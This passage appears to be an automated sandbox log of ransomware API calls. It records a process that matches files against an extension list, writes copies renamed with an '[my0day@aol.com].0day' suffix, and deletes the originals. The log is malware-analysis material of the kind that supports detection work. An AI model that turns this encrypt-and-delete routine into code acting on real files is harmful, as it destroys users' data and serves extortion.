(lpString1=".xls", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString=".xlsx") returned 5 [0048.047] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0048.047] lstrlenW (lpString=".ppt") returned 4 [0048.047] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString=".zip") returned 4 [0048.047] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString=".rar") returned 4 [0048.047] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString=".bz2") returned 4 [0048.047] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.047] lstrlenW (lpString=".7z") returned 3 [0048.047] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString=".dbf") returned 4 [0048.047] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString=".1cd") returned 4 [0048.047] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.047] lstrlenW (lpString=".jpg") returned 4 [0048.047] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0048.248] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.248] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.248] GetLastError () returned 0x0 [0048.248] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2cc, lpOverlapped=0x0) returned 1 [0048.254] WriteFile (in: hFile=0x21c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0048.257] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.257] WriteFile (in: hFile=0x21c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0048.257] SetEndOfFile (hFile=0x21c) returned 1 [0048.257] CloseHandle (hObject=0x21c) returned 1 [0048.257] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.257] SetEndOfFile (hFile=0x174) returned 1 [0048.258] CloseHandle (hObject=0x174) returned 1 [0048.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0048.258] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0048.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.258] lstrlenW (lpString=".doc") returned 4 [0048.258] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0048.258] lstrlenW (lpString=".docx") returned 5 [0048.259] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0048.259] lstrlenW (lpString=".pdf") returned 4 [0048.259] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString=".xls") returned 4 [0048.259] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString=".xlsx") returned 5 [0048.259] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0048.259] lstrlenW (lpString=".ppt") returned 4 [0048.259] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.259] lstrlenW (lpString=".zip") returned 4 [0048.259] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString=".rar") returned 4 [0048.259] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString=".bz2") returned 4 [0048.259] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString=".7z") returned 3 [0048.259] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0048.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.259] lstrlenW (lpString=".dbf") returned 4 [0048.259] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.259] lstrlenW (lpString=".1cd") returned 4 [0048.259] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0048.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0048.259] lstrlenW (lpString=".jpg") returned 4 [0048.259] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0048.260] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.260] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.261] GetLastError () returned 0x0 [0048.261] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x296a5, lpOverlapped=0x0) returned 1 [0048.275] WriteFile (in: hFile=0x21c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x296b0, lpOverlapped=0x0) returned 1 [0048.277] ReadFile (in: hFile=0x174, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.277] WriteFile (in: hFile=0x21c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.277] SetEndOfFile (hFile=0x21c) returned 1 [0048.278] CloseHandle (hObject=0x21c) returned 1 [0048.278] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.278] SetEndOfFile (hFile=0x174) returned 1 [0048.279] CloseHandle (hObject=0x174) returned 1 [0048.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0048.279] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0048.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.280] lstrlenW (lpString=".doc") returned 4 [0048.280] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0048.280] lstrlenW (lpString=".docx") returned 5 [0048.280] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0048.280] lstrlenW (lpString=".pdf") returned 4 [0048.280] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0048.280] lstrlenW (lpString=".xls") returned 4 [0048.280] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0048.280] lstrlenW (lpString=".xlsx") returned 5 [0048.280] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0048.280] lstrlenW (lpString=".ppt") returned 4 [0048.280] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0048.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.280] lstrlenW (lpString=".zip") returned 4 [0048.280] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0048.280] lstrlenW (lpString=".rar") returned 4 [0048.280] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0048.280] lstrlenW (lpString=".bz2") returned 4 [0048.280] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0048.280] lstrlenW (lpString=".7z") returned 3 [0048.280] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0048.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.280] lstrlenW (lpString=".dbf") returned 4 [0048.280] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0048.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.280] lstrlenW (lpString=".1cd") returned 4 [0048.281] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0048.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0048.281] lstrlenW (lpString=".jpg") returned 4 [0048.281] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0048.287] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.287] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.287] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0048.287] GetLastError () returned 0x0 [0048.287] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xae, lpOverlapped=0x0) returned 1 [0048.288] WriteFile (in: hFile=0x174, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xb0, lpOverlapped=0x0) returned 1 [0048.289] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.289] WriteFile (in: hFile=0x174, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.289] SetEndOfFile (hFile=0x174) returned 1 [0048.289] CloseHandle (hObject=0x174) returned 1 [0048.289] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.289] SetEndOfFile (hFile=0x220) returned 1 [0048.290] CloseHandle (hObject=0x220) returned 1 [0048.290] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x26) returned 1 [0048.290] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0048.290] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.290] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.290] lstrlenW (lpString=".doc") returned 4 [0048.290] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0048.290] lstrlenW (lpString=".docx") returned 5 [0048.290] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0048.290] lstrlenW (lpString=".pdf") returned 4 [0048.290] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0048.290] lstrlenW (lpString=".xls") returned 4 [0048.290] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0048.290] lstrlenW (lpString=".xlsx") returned 5 [0048.290] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0048.290] lstrlenW (lpString=".ppt") returned 4 [0048.290] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0048.291] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.291] lstrlenW (lpString=".zip") returned 4 [0048.291] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0048.291] lstrlenW (lpString=".rar") returned 4 [0048.291] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0048.291] lstrlenW (lpString=".bz2") returned 4 [0048.291] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0048.291] lstrlenW (lpString=".7z") returned 3 [0048.291] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0048.291] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.291] lstrlenW (lpString=".dbf") returned 4 [0048.291] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0048.291] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.291] lstrlenW (lpString=".1cd") returned 4 [0048.291] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0048.291] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0048.291] lstrlenW (lpString=".jpg") returned 4 [0048.291] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0051.104] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6431) returned 1 [0051.104] CloseHandle (hObject=0x210) returned 1 [0051.104] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png")) returned 0x20 [0051.104] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.105] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString=".doc") returned 4 [0051.105] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0051.105] lstrlenW (lpString=".docx") returned 5 [0051.105] lstrcmpiW (lpString1=".docx", lpString2="0.png") returned -1 [0051.105] lstrlenW (lpString=".pdf") returned 4 [0051.105] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0051.105] lstrlenW (lpString=".xls") returned 4 [0051.105] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0051.105] lstrlenW (lpString=".xlsx") returned 5 [0051.105] lstrcmpiW (lpString1=".xlsx", lpString2="0.png") returned -1 [0051.105] lstrlenW (lpString=".ppt") returned 4 [0051.105] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString=".zip") returned 4 [0051.105] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0051.105] lstrlenW (lpString=".rar") returned 4 [0051.105] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0051.105] lstrlenW (lpString=".bz2") returned 4 [0051.105] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0051.105] lstrlenW (lpString=".7z") returned 3 [0051.105] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString=".dbf") returned 4 [0051.105] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString=".1cd") returned 4 [0051.105] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0051.105] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 74 [0051.105] lstrlenW (lpString=".jpg") returned 4 [0051.105] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0051.141] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.141] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString=".doc") returned 4 [0051.142] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString=".docx") returned 5 [0051.142] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.142] lstrlenW (lpString=".pdf") returned 4 [0051.142] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString=".xls") returned 4 [0051.142] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.142] lstrlenW (lpString=".xlsx") returned 5 [0051.142] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.142] lstrlenW (lpString=".ppt") returned 4 [0051.142] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString=".zip") returned 4 [0051.142] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.142] lstrlenW (lpString=".rar") returned 4 [0051.142] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString=".bz2") returned 4 [0051.142] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString=".7z") returned 3 [0051.142] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.142] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString=".dbf") returned 4 [0051.142] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString=".1cd") returned 4 [0051.142] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.142] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.142] lstrlenW (lpString=".jpg") returned 4 [0051.142] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.143] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.143] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.143] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.143] lstrlenW (lpString=".doc") returned 4 [0051.143] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString=".docx") returned 5 [0051.143] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.143] lstrlenW (lpString=".pdf") returned 4 [0051.143] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString=".xls") returned 4 [0051.143] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.143] lstrlenW (lpString=".xlsx") returned 5 [0051.143] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.143] lstrlenW (lpString=".ppt") returned 4 [0051.143] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.143] lstrlenW (lpString=".zip") returned 4 [0051.143] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.143] lstrlenW (lpString=".rar") returned 4 [0051.143] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString=".bz2") returned 4 [0051.143] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString=".7z") returned 3 [0051.143] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.143] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.143] lstrlenW (lpString=".dbf") returned 4 [0051.143] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.143] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.144] lstrlenW (lpString=".1cd") returned 4 [0051.144] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.144] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.144] lstrlenW (lpString=".jpg") returned 4 [0051.144] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.144] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.144] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.144] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.144] lstrlenW (lpString=".doc") returned 4 [0051.144] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.144] lstrlenW (lpString=".docx") returned 5 [0051.144] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.144] lstrlenW (lpString=".pdf") returned 4 [0051.144] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.144] lstrlenW (lpString=".xls") returned 4 [0051.144] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.144] lstrlenW (lpString=".xlsx") returned 5 [0051.144] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.144] lstrlenW (lpString=".ppt") returned 4 [0051.144] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.144] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.144] lstrlenW (lpString=".zip") returned 4 [0051.144] lstrcmpiW (lpString1=".zip", 